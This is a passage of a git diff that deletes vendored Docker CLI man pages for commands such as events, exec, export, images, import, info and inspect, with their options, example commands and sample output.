whenry/testimage:latest) die - 2015-01-28T20:25:42.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) stop - 2015-01-28T20:25:45.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) start - 
2015-01-28T20:25:45.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) die - 2015-01-28T20:25:46.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) stop - -The following example outputs all events that were generated in the last 3 minutes, -relative to the current time on the client machine: - - # docker events --since '3m' - 2015-05-12T11:51:30.999999999Z07:00 4386fb97867d: (from ubuntu-1:14.04) die - 2015-05-12T15:52:12.999999999Z07:00 4386fb97867d: (from ubuntu-1:14.04) stop - 2015-05-12T15:53:45.999999999Z07:00 7805c1d35632: (from redis:2.8) die - 2015-05-12T15:54:03.999999999Z07:00 7805c1d35632: (from redis:2.8) stop - -If you do not provide the --since option, the command returns only new and/or -live events. - -## Format - -If a format (`--format`) is specified, the given template will be executed -instead of the default format. Go's **text/template** package describes all the -details of the format. - - # docker events --filter 'type=container' --format 'Type={{.Type}} Status={{.Status}} ID={{.ID}}' - Type=container Status=create ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - Type=container Status=attach ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - Type=container Status=start ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - Type=container Status=resize ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - Type=container Status=die ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - Type=container Status=destroy ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - -If a format is set to `{{json .}}`, the events are streamed as valid JSON -Lines. For information about JSON Lines, please refer to http://jsonlines.org/ . - - # docker events --format '{{json .}}' - {"status":"create","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. - {"status":"attach","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. 
- {"Type":"network","Action":"connect","Actor":{"ID":"1b50a5bf755f6021dfa78e.. - {"status":"start","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f42.. - {"status":"resize","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. - -## Filters - - $ docker events --filter 'event=stop' - 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2014-09-03T17:42:14.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - - $ docker events --filter 'image=ubuntu-1:14.04' - 2014-05-10T17:42:14.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - - $ docker events --filter 'container=7805c1d35632' - 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) - 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image= redis:2.8) - - $ docker events --filter 'container=7805c1d35632' --filter 'container=4386fb97867d' - 2014-09-03T15:49:29.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) - 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - - $ docker events --filter 'container=7805c1d35632' --filter 'event=stop' - 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - - $ docker events --filter 'type=volume' - 2015-12-23T21:05:28.136212689Z volume create test-event-volume-local (driver=local) - 2015-12-23T21:05:28.383462717Z volume mount test-event-volume-local (read/write=true, container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, destination=/foo, driver=local, propagation=rprivate) - 2015-12-23T21:05:28.650314265Z volume unmount 
test-event-volume-local (container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, driver=local) - 2015-12-23T21:05:28.716218405Z volume destroy test-event-volume-local (driver=local) - - $ docker events --filter 'type=network' - 2015-12-23T21:38:24.705709133Z network create 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, type=bridge) - 2015-12-23T21:38:25.119625123Z network connect 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, container=b4be644031a3d90b400f88ab3d4bdf4dc23adb250e696b6328b85441abe2c54e, type=bridge) - - $ docker events --filter 'type=plugin' (experimental) - 2016-07-25T17:30:14.825557616Z plugin pull ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest) - 2016-07-25T17:30:14.888127370Z plugin enable ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest) - - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -June 2015, updated by Brian Goff -October 2015, updated by Mike Brown diff --git a/vendor/github.com/docker/docker/man/docker-exec.1.md b/vendor/github.com/docker/docker/man/docker-exec.1.md deleted file mode 100644 index fe9c279e7e..0000000000 --- a/vendor/github.com/docker/docker/man/docker-exec.1.md +++ /dev/null @@ -1,71 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-exec - Run a command in a running container - -# SYNOPSIS -**docker exec** -[**-d**|**--detach**] -[**--detach-keys**[=*[]*]] -[**-e**|**--env**[=*[]*]] -[**--help**] -[**-i**|**--interactive**] -[**--privileged**] -[**-t**|**--tty**] -[**-u**|**--user**[=*USER*]] -CONTAINER COMMAND [ARG...] - -# DESCRIPTION - -Run a process in a running container. 
- -The command started using `docker exec` will only run while the container's primary -process (`PID 1`) is running, and will not be restarted if the container is restarted. - -If the container is paused, then the `docker exec` command will wait until the -container is unpaused, and then run - -# OPTIONS -**-d**, **--detach**=*true*|*false* - Detached mode: run command in the background. The default is *false*. - -**--detach-keys**="" - Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. - -**-e**, **--env**=[] - Set environment variables - - This option allows you to specify arbitrary environment variables that are -available for the command to be executed. - -**--help** - Print usage statement - -**-i**, **--interactive**=*true*|*false* - Keep STDIN open even if not attached. The default is *false*. - -**--privileged**=*true*|*false* - Give the process extended [Linux capabilities](http://man7.org/linux/man-pages/man7/capabilities.7.html) -when running in a container. The default is *false*. - - Without this flag, the process run by `docker exec` in a running container has -the same capabilities as the container, which may be limited. Set -`--privileged` to give all capabilities to the process. - -**-t**, **--tty**=*true*|*false* - Allocate a pseudo-TTY. The default is *false*. - -**-u**, **--user**="" - Sets the username or UID used and optionally the groupname or GID for the specified command. - - The followings examples are all valid: - --user [user | user:group | uid | uid:gid | user:gid | uid:group ] - - Without this argument the command will be run as root in the container. - -The **-t** option is incompatible with a redirection of the docker client -standard input. 
- -# HISTORY -November 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-export.1.md b/vendor/github.com/docker/docker/man/docker-export.1.md deleted file mode 100644 index 3d59e4788e..0000000000 --- a/vendor/github.com/docker/docker/man/docker-export.1.md +++ /dev/null @@ -1,46 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-export - Export the contents of a container's filesystem as a tar archive - -# SYNOPSIS -**docker export** -[**--help**] -[**-o**|**--output**[=*""*]] -CONTAINER - -# DESCRIPTION -Export the contents of a container's filesystem using the full or shortened -container ID or container name. The output is exported to STDOUT and can be -redirected to a tar file. - -Stream to a file instead of STDOUT by using **-o**. - -# OPTIONS -**--help** - Print usage statement - -**-o**, **--output**="" - Write to a file, instead of STDOUT - -# EXAMPLES -Export the contents of the container called angry_bell to a tar file -called angry_bell.tar: - - # docker export angry_bell > angry_bell.tar - # docker export --output=angry_bell-latest.tar angry_bell - # ls -sh angry_bell.tar - 321M angry_bell.tar - # ls -sh angry_bell-latest.tar - 321M angry_bell-latest.tar - -# See also -**docker-import(1)** to create an empty filesystem image -and import the contents of the tarball into it, then optionally tag it. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. 
-June 2014, updated by Sven Dowideit -January 2015, updated by Joseph Kern (josephakern at gmail dot com) diff --git a/vendor/github.com/docker/docker/man/docker-history.1.md b/vendor/github.com/docker/docker/man/docker-history.1.md deleted file mode 100644 index 91edefe25f..0000000000 --- a/vendor/github.com/docker/docker/man/docker-history.1.md +++ /dev/null @@ -1,52 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-history - Show the history of an image - -# SYNOPSIS -**docker history** -[**--help**] -[**-H**|**--human**[=*true*]] -[**--no-trunc**] -[**-q**|**--quiet**] -IMAGE - -# DESCRIPTION - -Show the history of when and how an image was created. - -# OPTIONS -**--help** - Print usage statement - -**-H**, **--human**=*true*|*false* - Print sizes and dates in human readable format. The default is *true*. - -**--no-trunc**=*true*|*false* - Don't truncate output. The default is *false*. - -**-q**, **--quiet**=*true*|*false* - Only show numeric IDs. The default is *false*. - -# EXAMPLES - $ docker history fedora - IMAGE CREATED CREATED BY SIZE COMMENT - 105182bb5e8b 5 days ago /bin/sh -c #(nop) ADD file:71356d2ad59aa3119d 372.7 MB - 73bd853d2ea5 13 days ago /bin/sh -c #(nop) MAINTAINER Lokesh Mandvekar 0 B - 511136ea3c5a 10 months ago 0 B Imported from - - -## Display comments in the image history -The `docker commit` command has a **-m** flag for adding comments to the image. These comments will be displayed in the image history. 
- - $ sudo docker history docker:scm - IMAGE CREATED CREATED BY SIZE COMMENT - 2ac9d1098bf1 3 months ago /bin/bash 241.4 MB Added Apache to Fedora base image - 88b42ffd1f7c 5 months ago /bin/sh -c #(nop) ADD file:1fd8d7f9f6557cafc7 373.7 MB - c69cab00d6ef 5 months ago /bin/sh -c #(nop) MAINTAINER Lokesh Mandvekar 0 B - 511136ea3c5a 19 months ago 0 B Imported from - - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-images.1.md b/vendor/github.com/docker/docker/man/docker-images.1.md deleted file mode 100644 index d7958d0dc4..0000000000 --- a/vendor/github.com/docker/docker/man/docker-images.1.md +++ /dev/null @@ -1,153 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-images - List images - -# SYNOPSIS -**docker images** -[**--help**] -[**-a**|**--all**] -[**--digests**] -[**-f**|**--filter**[=*[]*]] -[**--format**=*"TEMPLATE"*] -[**--no-trunc**] -[**-q**|**--quiet**] -[REPOSITORY[:TAG]] - -# DESCRIPTION -This command lists the images stored in the local Docker repository. - -By default, intermediate images, used during builds, are not listed. Some of the -output, e.g., image ID, is truncated, for space reasons. However the truncated -image ID, and often the first few characters, are enough to be used in other -Docker commands that use the image ID. The output includes repository, tag, image -ID, date created and the virtual size. - -The title REPOSITORY for the first title may seem confusing. It is essentially -the image name. However, because you can tag a specific image, and multiple tags -(image instances) can be associated with a single name, the name is really a -repository for all tagged images of the same name. For example consider an image -called fedora. It may be tagged with 18, 19, or 20, etc. to manage different -versions. 
- -# OPTIONS -**-a**, **--all**=*true*|*false* - Show all images (by default filter out the intermediate image layers). The default is *false*. - -**--digests**=*true*|*false* - Show image digests. The default is *false*. - -**-f**, **--filter**=[] - Filters the output based on these conditions: - - dangling=(true|false) - find unused images - - label= or label== - - before=([:tag]||) - - since=([:tag]||) - -**--format**="*TEMPLATE*" - Pretty-print images using a Go template. - Valid placeholders: - .ID - Image ID - .Repository - Image repository - .Tag - Image tag - .Digest - Image digest - .CreatedSince - Elapsed time since the image was created - .CreatedAt - Time when the image was created - .Size - Image disk size - -**--help** - Print usage statement - -**--no-trunc**=*true*|*false* - Don't truncate output. The default is *false*. - -**-q**, **--quiet**=*true*|*false* - Only show numeric IDs. The default is *false*. - -# EXAMPLES - -## Listing the images - -To list the images in a local repository (not the registry) run: - - docker images - -The list will contain the image repository name, a tag for the image, and an -image ID, when it was created and its virtual size. Columns: REPOSITORY, TAG, -IMAGE ID, CREATED, and SIZE. - -The `docker images` command takes an optional `[REPOSITORY[:TAG]]` argument -that restricts the list to images that match the argument. If you specify -`REPOSITORY`but no `TAG`, the `docker images` command lists all images in the -given repository. - - docker images java - -The `[REPOSITORY[:TAG]]` value must be an "exact match". This means that, for example, -`docker images jav` does not match the image `java`. - -If both `REPOSITORY` and `TAG` are provided, only images matching that -repository and tag are listed. 
To find all local images in the "java" -repository with tag "8" you can use: - - docker images java:8 - -To get a verbose list of images which contains all the intermediate images -used in builds use **-a**: - - docker images -a - -Previously, the docker images command supported the --tree and --dot arguments, -which displayed different visualizations of the image data. Docker core removed -this functionality in the 1.7 version. If you liked this functionality, you can -still find it in the third-party dockviz tool: https://github.com/justone/dockviz. - -## Listing images in a desired format - -When using the --format option, the image command will either output the data -exactly as the template declares or, when using the `table` directive, will -include column headers as well. You can use special characters like `\t` for -inserting tab spacing between columns. - -The following example uses a template without headers and outputs the ID and -Repository entries separated by a colon for all images: - - docker images --format "{{.ID}}: {{.Repository}}" - 77af4d6b9913: - b6fa739cedf5: committ - 78a85c484bad: ipbabble - 30557a29d5ab: docker - 5ed6274db6ce: - 746b819f315e: postgres - 746b819f315e: postgres - 746b819f315e: postgres - 746b819f315e: postgres - -To list all images with their repository and tag in a table format you can use: - - docker images --format "table {{.ID}}\t{{.Repository}}\t{{.Tag}}" - IMAGE ID REPOSITORY TAG - 77af4d6b9913 - b6fa739cedf5 committ latest - 78a85c484bad ipbabble - 30557a29d5ab docker latest - 5ed6274db6ce - 746b819f315e postgres 9 - 746b819f315e postgres 9.3 - 746b819f315e postgres 9.3.5 - 746b819f315e postgres latest - -Valid template placeholders are listed above. - -## Listing only the shortened image IDs - -Listing just the shortened image IDs. This can be useful for some automated -tools. 
- - docker images -q - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-import.1.md b/vendor/github.com/docker/docker/man/docker-import.1.md deleted file mode 100644 index 43d65efe6a..0000000000 --- a/vendor/github.com/docker/docker/man/docker-import.1.md +++ /dev/null @@ -1,72 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-import - Create an empty filesystem image and import the contents of the tarball (.tar, .tar.gz, .tgz, .bzip, .tar.xz, .txz) into it, then optionally tag it. - -# SYNOPSIS -**docker import** -[**-c**|**--change**[=*[]*]] -[**-m**|**--message**[=*MESSAGE*]] -[**--help**] -file|URL|**-**[REPOSITORY[:TAG]] - -# OPTIONS -**-c**, **--change**=[] - Apply specified Dockerfile instructions while importing the image - Supported Dockerfile instructions: `CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR` - -**--help** - Print usage statement - -**-m**, **--message**="" - Set commit message for imported image - -# DESCRIPTION -Create a new filesystem image from the contents of a tarball (`.tar`, -`.tar.gz`, `.tgz`, `.bzip`, `.tar.xz`, `.txz`) into it, then optionally tag it. - - -# EXAMPLES - -## Import from a remote location - - # docker import http://example.com/exampleimage.tgz example/imagerepo - -## Import from a local file - -Import to docker via pipe and stdin: - - # cat exampleimage.tgz | docker import - example/imagelocal - -Import with a commit message. - - # cat exampleimage.tgz | docker import --message "New image imported from tarball" - exampleimagelocal:new - -Import to a Docker image from a local file. 
- - # docker import /path/to/exampleimage.tgz - - -## Import from a local file and tag - -Import to docker via pipe and stdin: - - # cat exampleimageV2.tgz | docker import - example/imagelocal:V-2.0 - -## Import from a local directory - - # tar -c . | docker import - exampleimagedir - -## Apply specified Dockerfile instructions while importing the image -This example sets the docker image ENV variable DEBUG to true by default. - - # tar -c . | docker import -c="ENV DEBUG true" - exampleimagedir - -# See also -**docker-export(1)** to export the contents of a filesystem as a tar archive to STDOUT. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-info.1.md b/vendor/github.com/docker/docker/man/docker-info.1.md deleted file mode 100644 index bb7a8fb4c2..0000000000 --- a/vendor/github.com/docker/docker/man/docker-info.1.md +++ /dev/null @@ -1,187 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-info - Display system-wide information - -# SYNOPSIS -**docker info** -[**--help**] -[**-f**|**--format**[=*FORMAT*]] - -# DESCRIPTION -This command displays system wide information regarding the Docker installation. -Information displayed includes the kernel version, number of containers and images. -The number of images shown is the number of unique images. The same image tagged -under different names is counted only once. - -If a format is specified, the given template will be executed instead of the -default format. Go's **text/template** package -describes all the details of the format. - -Depending on the storage driver in use, additional information can be shown, such -as pool name, data file, metadata file, data space used, total data space, metadata -space used, and total metadata space. 
- -The data file is where the images are stored and the metadata file is where the -meta data regarding those images are stored. When run for the first time Docker -allocates a certain amount of data space and meta data space from the space -available on the volume where `/var/lib/docker` is mounted. - -# OPTIONS -**--help** - Print usage statement - -**-f**, **--format**="" - Format the output using the given Go template - -# EXAMPLES - -## Display Docker system information - -Here is a sample output for a daemon running on Ubuntu, using the overlay2 -storage driver: - - $ docker -D info - Containers: 14 - Running: 3 - Paused: 1 - Stopped: 10 - Images: 52 - Server Version: 1.13.0 - Storage Driver: overlay2 - Backing Filesystem: extfs - Supports d_type: true - Native Overlay Diff: false - Logging Driver: json-file - Cgroup Driver: cgroupfs - Plugins: - Volume: local - Network: bridge host macvlan null overlay - Swarm: active - NodeID: rdjq45w1op418waxlairloqbm - Is Manager: true - ClusterID: te8kdyw33n36fqiz74bfjeixd - Managers: 1 - Nodes: 2 - Orchestration: - Task History Retention Limit: 5 - Raft: - Snapshot Interval: 10000 - Number of Old Snapshots to Retain: 0 - Heartbeat Tick: 1 - Election Tick: 3 - Dispatcher: - Heartbeat Period: 5 seconds - CA Configuration: - Expiry Duration: 3 months - Node Address: 172.16.66.128 172.16.66.129 - Manager Addresses: - 172.16.66.128:2477 - Runtimes: runc - Default Runtime: runc - Init Binary: docker-init - containerd version: 8517738ba4b82aff5662c97ca4627e7e4d03b531 - runc version: ac031b5bf1cc92239461125f4c1ffb760522bbf2 - init version: N/A (expected: v0.13.0) - Security Options: - apparmor - seccomp - Profile: default - Kernel Version: 4.4.0-31-generic - Operating System: Ubuntu 16.04.1 LTS - OSType: linux - Architecture: x86_64 - CPUs: 2 - Total Memory: 1.937 GiB - Name: ubuntu - ID: H52R:7ZR6:EIIA:76JG:ORIY:BVKF:GSFU:HNPG:B5MK:APSC:SZ3Q:N326 - Docker Root Dir: /var/lib/docker - Debug Mode (client): true - Debug Mode 
(server): true - File Descriptors: 30 - Goroutines: 123 - System Time: 2016-11-12T17:24:37.955404361-08:00 - EventsListeners: 0 - Http Proxy: http://test:test@proxy.example.com:8080 - Https Proxy: https://test:test@proxy.example.com:8080 - No Proxy: localhost,127.0.0.1,docker-registry.somecorporation.com - Registry: https://index.docker.io/v1/ - WARNING: No swap limit support - Labels: - storage=ssd - staging=true - Experimental: false - Insecure Registries: - 127.0.0.0/8 - Registry Mirrors: - http://192.168.1.2/ - http://registry-mirror.example.com:5000/ - Live Restore Enabled: false - - - -The global `-D` option tells all `docker` commands to output debug information. - -The example below shows the output for a daemon running on Red Hat Enterprise Linux, -using the devicemapper storage driver. As can be seen in the output, additional -information about the devicemapper storage driver is shown: - - $ docker info - Containers: 14 - Running: 3 - Paused: 1 - Stopped: 10 - Untagged Images: 52 - Server Version: 1.10.3 - Storage Driver: devicemapper - Pool Name: docker-202:2-25583803-pool - Pool Blocksize: 65.54 kB - Base Device Size: 10.74 GB - Backing Filesystem: xfs - Data file: /dev/loop0 - Metadata file: /dev/loop1 - Data Space Used: 1.68 GB - Data Space Total: 107.4 GB - Data Space Available: 7.548 GB - Metadata Space Used: 2.322 MB - Metadata Space Total: 2.147 GB - Metadata Space Available: 2.145 GB - Udev Sync Supported: true - Deferred Removal Enabled: false - Deferred Deletion Enabled: false - Deferred Deleted Device Count: 0 - Data loop file: /var/lib/docker/devicemapper/devicemapper/data - Metadata loop file: /var/lib/docker/devicemapper/devicemapper/metadata - Library Version: 1.02.107-RHEL7 (2015-12-01) - Execution Driver: native-0.2 - Logging Driver: json-file - Plugins: - Volume: local - Network: null host bridge - Kernel Version: 3.10.0-327.el7.x86_64 - Operating System: Red Hat Enterprise Linux Server 7.2 (Maipo) - OSType: linux - Architecture: x86_64 
- CPUs: 1 - Total Memory: 991.7 MiB - Name: ip-172-30-0-91.ec2.internal - ID: I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S - Docker Root Dir: /var/lib/docker - Debug mode (client): false - Debug mode (server): false - Username: gordontheturtle - Registry: https://index.docker.io/v1/ - Insecure registries: - myinsecurehost:5000 - 127.0.0.0/8 - -You can also specify the output format: - - $ docker info --format '{{json .}}' - {"ID":"I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S","Containers":14, ...} - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-inspect.1.md b/vendor/github.com/docker/docker/man/docker-inspect.1.md deleted file mode 100644 index 21d7ba678a..0000000000 --- a/vendor/github.com/docker/docker/man/docker-inspect.1.md +++ /dev/null @@ -1,323 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-inspect - Return low-level information on docker objects - -# SYNOPSIS -**docker inspect** -[**--help**] -[**-f**|**--format**[=*FORMAT*]] -[**-s**|**--size**] -[**--type**=*container*|*image*|*network*|*node*|*service*|*task*|*volume*] -NAME|ID [NAME|ID...] - -# DESCRIPTION - -This displays the low-level information on Docker object(s) (e.g. container, -image, volume,network, node, service, or task) identified by name or ID. By default, -this will render all results in a JSON array. If the container and image have -the same name, this will return container JSON for unspecified type. If a format -is specified, the given template will be executed for each result. 
- -# OPTIONS -**--help** - Print usage statement - -**-f**, **--format**="" - Format the output using the given Go template - -**-s**, **--size** - Display total file sizes if the type is container - -**--type**=*container*|*image*|*network*|*node*|*service*|*task*|*volume* - Return JSON for specified type, permissible values are "image", "container", - "network", "node", "service", "task", and "volume" - -# EXAMPLES - -Get information about an image when image name conflicts with the container name, -e.g. both image and container are named rhel7: - - $ docker inspect --type=image rhel7 - [ - { - "Id": "fe01a428b9d9de35d29531e9994157978e8c48fa693e1bf1d221dffbbb67b170", - "Parent": "10acc31def5d6f249b548e01e8ffbaccfd61af0240c17315a7ad393d022c5ca2", - .... - } - ] - -## Getting information on a container - -To get information on a container use its ID or instance name: - - $ docker inspect d2cc496561d6 - [{ - "Id": "d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47", - "Created": "2015-06-08T16:18:02.505155285Z", - "Path": "bash", - "Args": [], - "State": { - "Running": false, - "Paused": false, - "Restarting": false, - "OOMKilled": false, - "Dead": false, - "Pid": 0, - "ExitCode": 0, - "Error": "", - "StartedAt": "2015-06-08T16:18:03.643865954Z", - "FinishedAt": "2015-06-08T16:57:06.448552862Z" - }, - "Image": "ded7cd95e059788f2586a51c275a4f151653779d6a7f4dad77c2bd34601d94e4", - "NetworkSettings": { - "Bridge": "", - "SandboxID": "6b4851d1903e16dd6a567bd526553a86664361f31036eaaa2f8454d6f4611f6f", - "HairpinMode": false, - "LinkLocalIPv6Address": "", - "LinkLocalIPv6PrefixLen": 0, - "Ports": {}, - "SandboxKey": "/var/run/docker/netns/6b4851d1903e", - "SecondaryIPAddresses": null, - "SecondaryIPv6Addresses": null, - "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d", - "Gateway": "172.17.0.1", - "GlobalIPv6Address": "", - "GlobalIPv6PrefixLen": 0, - "IPAddress": "172.17.0.2", - "IPPrefixLen": 16, - "IPv6Gateway": "", - 
"MacAddress": "02:42:ac:12:00:02", - "Networks": { - "bridge": { - "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", - "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d", - "Gateway": "172.17.0.1", - "IPAddress": "172.17.0.2", - "IPPrefixLen": 16, - "IPv6Gateway": "", - "GlobalIPv6Address": "", - "GlobalIPv6PrefixLen": 0, - "MacAddress": "02:42:ac:12:00:02" - } - } - - }, - "ResolvConfPath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/resolv.conf", - "HostnamePath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/hostname", - "HostsPath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/hosts", - "LogPath": "/var/lib/docker/containers/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47/d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47-json.log", - "Name": "/adoring_wozniak", - "RestartCount": 0, - "Driver": "devicemapper", - "MountLabel": "", - "ProcessLabel": "", - "Mounts": [ - { - "Source": "/data", - "Destination": "/data", - "Mode": "ro,Z", - "RW": false - "Propagation": "" - } - ], - "AppArmorProfile": "", - "ExecIDs": null, - "HostConfig": { - "Binds": null, - "ContainerIDFile": "", - "Memory": 0, - "MemorySwap": 0, - "CpuShares": 0, - "CpuPeriod": 0, - "CpusetCpus": "", - "CpusetMems": "", - "CpuQuota": 0, - "BlkioWeight": 0, - "OomKillDisable": false, - "Privileged": false, - "PortBindings": {}, - "Links": null, - "PublishAllPorts": false, - "Dns": null, - "DnsSearch": null, - "DnsOptions": null, - "ExtraHosts": null, - "VolumesFrom": null, - "Devices": [], - "NetworkMode": "bridge", - "IpcMode": "", - "PidMode": "", - "UTSMode": "", - "CapAdd": null, - "CapDrop": null, - "RestartPolicy": { - "Name": "no", - "MaximumRetryCount": 0 - }, - "SecurityOpt": null, - "ReadonlyRootfs": false, - "Ulimits": null, - "LogConfig": { - "Type": 
"json-file", - "Config": {} - }, - "CgroupParent": "" - }, - "GraphDriver": { - "Name": "devicemapper", - "Data": { - "DeviceId": "5", - "DeviceName": "docker-253:1-2763198-d2cc496561d6d520cbc0236b4ba88c362c446a7619992123f11c809cded25b47", - "DeviceSize": "171798691840" - } - }, - "Config": { - "Hostname": "d2cc496561d6", - "Domainname": "", - "User": "", - "AttachStdin": true, - "AttachStdout": true, - "AttachStderr": true, - "ExposedPorts": null, - "Tty": true, - "OpenStdin": true, - "StdinOnce": true, - "Env": null, - "Cmd": [ - "bash" - ], - "Image": "fedora", - "Volumes": null, - "VolumeDriver": "", - "WorkingDir": "", - "Entrypoint": null, - "NetworkDisabled": false, - "MacAddress": "", - "OnBuild": null, - "Labels": {}, - "Memory": 0, - "MemorySwap": 0, - "CpuShares": 0, - "Cpuset": "", - "StopSignal": "SIGTERM" - } - } - ] -## Getting the IP address of a container instance - -To get the IP address of a container use: - - $ docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' d2cc496561d6 - 172.17.0.2 - -## Listing all port bindings - -One can loop over arrays and maps in the results to produce simple text -output: - - $ docker inspect --format='{{range $p, $conf := .NetworkSettings.Ports}} \ - {{$p}} -> {{(index $conf 0).HostPort}} {{end}}' d2cc496561d6 - 80/tcp -> 80 - -You can get more information about how to write a Go template from: -https://golang.org/pkg/text/template/. - -## Getting size information on a container - - $ docker inspect -s d2cc496561d6 - [ - { - .... - "SizeRw": 0, - "SizeRootFs": 972, - .... 
- } - ] - -## Getting information on an image - -Use an image's ID or name (e.g., repository/name[:tag]) to get information -about the image: - - $ docker inspect ded7cd95e059 - [{ - "Id": "ded7cd95e059788f2586a51c275a4f151653779d6a7f4dad77c2bd34601d94e4", - "Parent": "48ecf305d2cf7046c1f5f8fcbcd4994403173441d4a7f125b1bb0ceead9de731", - "Comment": "", - "Created": "2015-05-27T16:58:22.937503085Z", - "Container": "76cf7f67d83a7a047454b33007d03e32a8f474ad332c3a03c94537edd22b312b", - "ContainerConfig": { - "Hostname": "76cf7f67d83a", - "Domainname": "", - "User": "", - "AttachStdin": false, - "AttachStdout": false, - "AttachStderr": false, - "ExposedPorts": null, - "Tty": false, - "OpenStdin": false, - "StdinOnce": false, - "Env": null, - "Cmd": [ - "/bin/sh", - "-c", - "#(nop) ADD file:4be46382bcf2b095fcb9fe8334206b584eff60bb3fad8178cbd97697fcb2ea83 in /" - ], - "Image": "48ecf305d2cf7046c1f5f8fcbcd4994403173441d4a7f125b1bb0ceead9de731", - "Volumes": null, - "VolumeDriver": "", - "WorkingDir": "", - "Entrypoint": null, - "NetworkDisabled": false, - "MacAddress": "", - "OnBuild": null, - "Labels": {} - }, - "DockerVersion": "1.6.0", - "Author": "Lokesh Mandvekar \u003clsm5@fedoraproject.org\u003e", - "Config": { - "Hostname": "76cf7f67d83a", - "Domainname": "", - "User": "", - "AttachStdin": false, - "AttachStdout": false, - "AttachStderr": false, - "ExposedPorts": null, - "Tty": false, - "OpenStdin": false, - "StdinOnce": 